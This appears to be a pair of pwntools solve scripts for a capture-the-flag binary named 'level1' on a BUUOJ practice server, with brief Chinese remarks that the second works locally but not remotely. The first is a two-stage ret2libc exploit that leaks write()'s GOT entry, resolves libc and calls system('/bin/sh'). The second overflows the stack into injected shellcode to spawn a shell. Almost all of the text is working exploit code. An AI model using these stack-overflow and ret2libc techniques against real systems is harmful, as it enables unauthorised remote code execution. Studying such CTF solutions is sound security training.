"""ret2libc solve script for ./level1 (remote target).

Two round trips over one connection:
  1. Overflow the stack buffer so the program returns into write@plt, which
     prints the 4-byte GOT entry of write() back to us, then returns into
     vulnerable_function so a second overflow is possible.
  2. Resolve the libc build from that leaked address (LibcSearcher, a
     third-party lookup), compute system() and "/bin/sh", and overflow again
     to call system("/bin/sh").

What the binary must look like for this to work (all inferred from the
payload layout, not verified here — TODO confirm with `checksec`):
  - PLT/GOT/symbol addresses are used with no base adjustment, so the
    target is presumably a non-PIE build;
  - the overwrite reaches the saved return address, so no stack canary is
    presumed to sit between the buffer and it.
PIE plus stack canaries would defeat exactly those two assumptions.
"""
from pwn import *
from LibcSearcher import LibcSearcher

context.log_level = "debug"
# io = process("./level1")  # local variant, kept for reference
io = remote("node4.buuoj.cn",29196)
elf = ELF("./level1")

# Distance from the start of the overflowed buffer to the saved frame
# pointer; the `+ 4` below steps over it to the return address
# (i386 frame layout assumed — TODO confirm in a debugger).
offset = 0x88
vuln_addr = elf.symbols["vulnerable_function"]
write_plt = elf.plt["write"]
write_got = elf.got["write"]
# 0x0804847B  -- presumably the resolved vuln_addr, left by the author

# Fake i386 cdecl frame: callee = write@plt, return address = vuln_addr
# (re-enter the vulnerable function for stage 2), then write()'s arguments
# fd=0, buf=write@got, len=4.
payload = b"A" * (offset + 4) + p32(write_plt) + p32(vuln_addr) + p32(0) + p32(write_got) + p32(4)
io.sendline(payload)

# The 4 leaked bytes are write()'s runtime address inside libc
# (assumes recv() returns exactly those 4 bytes — TODO confirm).
write_addr = u32(io.recv())
print("recv --- >",hex(write_addr))

# LibcSearcher matches the leaked address against known libc builds
# (presumably on its page-offset bits) and returns symbol offsets for the
# matched build; ambiguity here is resolved interactively by the library.
libc = LibcSearcher("write",write_addr)
libcbase = write_addr - libc.dump("write")
system_addr = libcbase + libc.dump("system")
bin_sh = libcbase + libc.dump("str_bin_sh")

# Stage 2 frame: return into system(), 0x1 as a throwaway return address,
# pointer to libc's "/bin/sh" string as the single argument.
payload = b"A" * (offset + 4) + p32(system_addr) + p32(0x1) + p32(bin_sh)
io.sendline(payload)
io.interactive()
打远程的
shellcode 写在栈上的估计远程打不通
"""Return-to-stack shellcode attempt against ./level1 (remote variant).

The service prints a line that contains a stack address; the script parses
it, puts shellcraft.sh() shellcode at the start of the input, pads to 0x8c
bytes, and overwrites the saved return address with that buffer address so
execution lands on the shellcode.

This only works when the stack is executable (NX disabled) and the printed
address is the real runtime address of the buffer; the author reports it
works locally but not against the remote service. The remote host's
NX/ASLR configuration is the natural thing to check first — TODO confirm
with `checksec` / the program's output.
"""
from pwn import*

context(arch='i386',os='linux',log_level='debug')
io = remote("node4.buuoj.cn",29172)
#io = process('./level1')  # local variant, kept for reference
sleep(0.1)

shellcode = asm(shellcraft.sh())

# Parse the leaked buffer address from the banner line.
# Assumes it is exactly 8 hex digits at a fixed column (bytes 14..21) of
# that line — TODO confirm against the program's actual output format.
buf = io.recvline()
buf_addr = buf[14:22]
buf_addr = int(buf_addr,16)
log.success(hex(buf_addr))

#shellcode = asm(shellcraft.sh())
# Shellcode first, padding up to the saved return address (0x8c bytes in
# total, presumably 0x88 buffer + 4 saved ebp — TODO confirm), then the
# return address pointing back at the start of the buffer.
shellcode = shellcode.ljust(0x8c,b'a')
shellcode+=p32(buf_addr)
io.sendline(shellcode)
io.interactive()
这个本地打得通，远程不行。
